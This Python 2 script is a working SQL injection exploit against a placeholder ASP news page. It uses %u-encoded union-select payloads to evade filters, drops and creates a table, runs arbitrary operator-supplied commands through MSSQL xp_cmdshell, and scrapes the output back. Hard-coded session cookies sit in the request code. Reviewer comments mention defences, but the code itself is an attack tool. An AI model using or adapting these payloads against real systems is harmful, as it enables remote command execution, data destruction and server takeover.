import sys, urllib2, time, os , Queue, threading,re,string
 
def cslogo():
    """Print the tool's ASCII-art banner to stdout."""
    # Raw string: the art is full of backslashes that must reach stdout
    # untouched.  None of them forms a recognised escape sequence, so the
    # printed bytes are the same as with a plain literal, minus the
    # invalid-escape warnings newer interpreters emit.
    banner = r'''
  ___ ___ ____ ____ ____ __ __ _ _
 / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
 \___)\___/(____/(____)(__) (____)(__)(__)(__)
 Name:get title exploit
 
'''
    print(banner)
 
# show message
def msg(text, type=0):
    """Print *text* prefixed with a status tag.

    ``type`` 0 yields ``[*]`` (info), 1 yields ``[+]`` (success) and any
    other value yields ``[-]`` (failure).  The parameter shadows the
    builtin ``type``; the name is kept because callers may pass it by
    keyword.
    """
    tag = "[*]" if type == 0 else "[+]" if type == 1 else "[-]"
    print(tag + text)
 
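def find_text(text, start, end):
    """Return the text between the first *start* marker and the *end* marker.

    *start* and *end* are literal delimiters, not patterns.  They are
    escaped before the expression is built, so a marker containing regex
    metacharacters (``(``, ``?``, ``.`` ...) can no longer shift the
    captured group or raise ``re.error``.  The match stays greedy and does
    not span newlines, exactly as before.

    Returns:
        The captured text, or the sentinel string ``"none"`` when the
        markers are not found.
    """
    pattern = '%s(.*)%s' % (re.escape(start), re.escape(end))
    match = re.search(pattern, text)
    if match is None:
        return "none"
    return match.group(1)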
 
def gbk2utf8(text):
    data=unicode(text,"gb2312")
    return data.encode("utf-8")
 
# get url data
def get(url):
    try:
      r = urllib2.urlopen(url, timeout=20)
      return r.read()
    except :
      return "none"
 
def post(url, data):
    """POST *data* to *url* with a 30 s timeout and return the response body.

    Every request carries a fixed ``Cookie`` header.  An HTTP error status
    is not treated as a failure: the body of the error response is
    returned instead.  Any other exception (``urllib2.URLError`` that is
    not an ``HTTPError``, socket errors, a malformed URL) propagates to the
    caller.
    """
    # NOTE(review): the header value below is a literal set of cookies
    # whose names (ASPSESSIONID*, st8id, __utm*) look like session and
    # tracking identifiers.  Credentials of that kind do not belong in
    # source and are presumably stale; load them from configuration.
    cookie_header = (
        'Cookie',
        '__utma=79235852.287466356.1385124666.1385124666.1385213546.2; __utmz=79235852.1385124666.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAQDRACBC=OJMFPBPBILEDANAEOPGAMIGL; st8id=1e1bcc1010b6de32734c584317443b31.00.cc781be5683b8a8f6de679b0911732d2; ASPSESSIONIDCQBRBCBD=CGGBLCJCFMAAGPFKJAEEHAOC; ASPSESSIONIDCQARBDBD=JLKPAILCMMBNGNGDLLPLFKGH; ASPSESSIONIDAQATDAAC=MGHBOLDDOLLGPOHMDBMDLDIL',
    )
    opener = urllib2.build_opener()
    opener.addheaders.append(cookie_header)
    try:
        response = opener.open(url, data, timeout=30)
    except urllib2.HTTPError as error:
        return error.read()
    return response.read()
 
 
if __name__ == '__main__':
 
   # Entry point.  The command to run is the first CLI argument; the
   # script raises IndexError when it is missing.
   cslogo()
   cmd=sys.argv[1];
   msg("mssql sql cmd exploit")
   # NOTE(review): the host (a placeholder, xxx.com), the injected `iid`
   # parameter and the HTML markers used to read results back are all
   # hard-coded in the requests below.  On the defending side this is the
   # textbook case for parameterized queries and a least-privilege database
   # login with xp_cmdshell left disabled; the `%uXXXX` encoding of SQL
   # keywords in these bodies is a filter-evasion pattern, so web-tier
   # request inspection must decode %u sequences before matching.
   # create the scratch table the later requests write to and read from
   post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20employee),4%20;DROP%20TABLE%20xxoo;create%20table%20xxoo(id%20int%20identity(1,1),dir%20ntext);--")
   # execute the command; its output lands in the scratch table
   post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20xxoo),4%20;insert%20xxoo%20exec%20%u004daster.dbo.%u0078p_cmdshell%20'"+cmd+"'; --")
   # fetch the row count; find_text returns the sentinel "none" when the
   # markers are absent from the page
   html=post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20xxoo),4%20;--")
   i=find_text(html,'<font size=\"2\" color=\"#800000\">','</font>')
   # Both initial values are dead: `where` is overwritten inside the loop
   # before it is used and `res` is only read after being reassigned.
   where="%20where%20id=1),4%20;--";
   res="none";
   if i != "none" :
     msg("result rows: %s" % i);
     # int(i) raises ValueError when the marker text is not a number.
     for t in range(int(i)):
       where="%20where%20id="+str(t)+"),4%20;--";
       html=post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20top%201%20dir%20from%20xxoo"+where)
       res=find_text(html,'<font size=\"2\" color=\"#800000\">','</font>')
       print res
 
 
   
